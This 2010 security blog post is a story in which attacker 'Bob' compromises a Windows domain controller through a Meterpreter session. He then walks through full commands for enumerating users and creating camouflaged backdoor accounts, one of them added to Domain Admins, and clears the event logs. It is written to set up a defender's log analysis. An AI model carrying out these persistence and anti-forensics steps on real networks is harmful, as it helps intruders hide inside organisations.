Tuesday, January 19, 2010

What Bob Did. What Alice Saw - Part 1

Recently I've been have way to much fun looking at event logs and digging out which events are indicators of a compromise. As is typical for me I'll try to wrap some of that knowledge up into a little Bob story. So here goes.

Part 1 - What Bob did.

Bob has been up to his old tricks again and has found himself on the wrong side of someones firewall. Well maybe not the wrong side as far as Bob is concerned but it certainly is for Alice, our Systems Administrator. Bob being Bob decides to start his day with a little pwnage, he hunts around for a target and after a little scanning decides to go with a wide open domain controller which he likes to call, or as Alice would call it, Server04.

Bob, sporting his brand new installation of BackTrack4 , decides to test drive the fantastic Fast-Track scripts. He uses Fast-Track not because he's lazy or can't be bothered to learn Metasploit, but because he only has a few minutes before work and he needs to get his pwnage on pretty sharpish.

After successfully getting his Meterpreter session Bob uses the shell command to drop down to a Command prompt. Once at the prompt he decides to list the users on the domain.

net user /domain

The resulting list is quite long and split into 3 columns, as Bob intends to extract the user list to use in future scripts he decides to make use of the DSQUERY command to give him the list in a nice single line list.

dsquery * -filter "(&(objectcategory=person)(objectclass=user)(name=*))" -limit 0 -attr samaccountname

With that done Bob decides to go ahead and quickly create a couple of accounts. He wants to create 2 accounts, one as a user because after all thats where the data is right. The other account will be an administrative user because that will help him get to other interesting places on the network. Another good reason for having 2 accounts is if Wallifords discover his intrusion they'll likely try to identify the intruders user account and may well stop when they find the first one. Cunning eh!

Now in the past Bob has used "Net User username password /add" to do this, but that will create an account that even the crappiest of admins will spot. What Bob needs to do is create an account that blends in with the rest of the user accounts, to do this he takes a look at a few user accounts that already exist to see what account properties are populated as standard.

dsquery * -filter "(&(objectcategory=person)(objectclass=user)(samaccountname=jimm))" -limit 0 -attr *

From here Bob can see that the user Jim Morrison has a Title, Office, Display Name, telephone Number and Home Drive fields neatly populated as do many of the other users. Armed with that knowledge Bob creates an account with DSADD that will sit nicely with the other accounts in the same Organisational Unit.

dsadd user "CN=Bob Ball,OU=Internal,DC=walliford,DC=local" -Samid BobB -Pwd Eviluser123 -fn Bob -Ln Ball -Display "Bob Ball" -Office Leeds -Tel "01233 455779" -Dept HR -hmdir \\wal-filer\users\BobB -Title Manager -upn BobB@walliford.local

Bob checks his handy work before he moves onto his next task.

dsquery * -filter "(&(objectcategory=person)(objectclass=user)(samaccountname=BobB))" -limit 0 -attr *

Now Bob wants to give this user account access to some data, and that will be done by making Bob a member of some groups.

dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=*))" -limit 0 -attr Name

So there is the list of groups but lets take a closer look at the HR one first.

dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=HR))" -limit 0 -attr *

Okay that'll do. Bob just needs to modify the properties with DSMOD to add his user account as a member.

dsmod group "CN=HR,OU=Internal,DC=walliford,DC=local" -addmbr "CN=Bob Ball,OU=Internal,DC=walliford,DC=local"

With that sorted Bob wants to create his admin user. hmmm something that wont stand out again. He models the account of other built-in accounts and sets his password to never expire. Hopefully this won't raise any eyebrows.

dsadd user "CN=Cert Owner,CN=Users,DC=walliford,DC=local" -Samid CertOwner -Pwd EvilAdmin123 -Desc "Built-in account for administering certificates" -Display "Domain Certificate Owner" -pwdneverexpires yes

Brilliant. No need to go to town on the groups again. This time he's adding the account straight into Domain Admins.

net group "Domain Admins" CertOwner /add

With that done Bob decides he really needs to get off to work.

Whilst Bobs at work he's slightly troubled that he may have left traces in the logs on the server he compromised. As soon as he gets home he hops back onto the network and just for fun connect through RDP to the server to test his account.

Works like a charm. He has a quick look around and logs off the RDP session. Then Bob remembers what he was supposed to be doing. He gets a new Meterpreter session up and issues the command to clear the logs


All sorted. Now it's dinner time, pie and chips tonight.

Coming up...What Alice Saw.


Anonymous said...

Could you please post "clearev" script ?

SynJunkie said...

clearev is one of the commands built into Meterpreter (Metasploit)

Kiddo said...

Thanks! Another excellent and valuable post.

Sherwyn aka (Infolookup) said...


As always man nice stuff, I am becoming a big fan of the Bob now Alice series lol.

Stories I can read to the kids at bed time.

SynJunkie said...

Cheers guys.

Sherwyn - I'm starting to worry about you dude. Evil bob stories at bedtime!!!!


Sherwyn aka (Infolookup) said...

Hey the will certainly sleep well, and over night become as paranoid as everyone else in the Biz :).

SynJunkie said...

In that case i better hurry up and post part 2, otherwise i'll have your kids on at me as well !!!